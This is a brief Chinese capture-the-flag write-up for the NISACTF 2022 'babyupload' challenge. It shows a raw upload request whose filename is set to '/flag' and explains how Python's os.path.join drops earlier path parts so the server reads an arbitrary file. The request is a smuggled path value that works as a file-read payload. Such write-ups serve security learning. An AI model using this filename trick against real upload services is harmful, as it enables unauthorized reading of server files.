[NISACTF 2022]babyupload
play
POST /upload HTTP/1.1
Host: node3.anna.nssctf.cn:28406
Content-Length: 281
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://node3.anna.nssctf.cn:28406
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykKvk8siwQSnAXAaN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://node3.anna.nssctf.cn:28406/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarykKvk8siwQSnAXAaN
Content-Disposition: form-data; name="file"; filename="/flag"
Content-Type: image/jpeg
------WebKitFormBoundarykKvk8siwQSnAXAaN
Content-Disposition: form-data; name="submit"
Upload File
------WebKitFormBoundarykKvk8siwQSnAXAaN--
响应
HTTP/1.0 302 FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 282
Location: http://node3.anna.nssctf.cn:28406/file/08a8b5023362406f9e619a43f4d3129e
Server: Werkzeug/2.0.3 Python/3.7.10
Date: Tue, 16 May 2023 06:16:03 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/file/08a8b5023362406f9e619a43f4d3129e">/file/08a8b5023362406f9e619a43f4d3129e</a>. If not click the link.
访问/file/08a8b5023362406f9e619a43f4d3129e 得到flag
知识点
- filename=“/flag”
- 利用 os.path.join 处理路径的拼接问题
os.path.join()函数:
第一个以”/”开头的参数开始拼接,之前的参数全部丢弃,当有多个时,从最后一个开始
5960
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
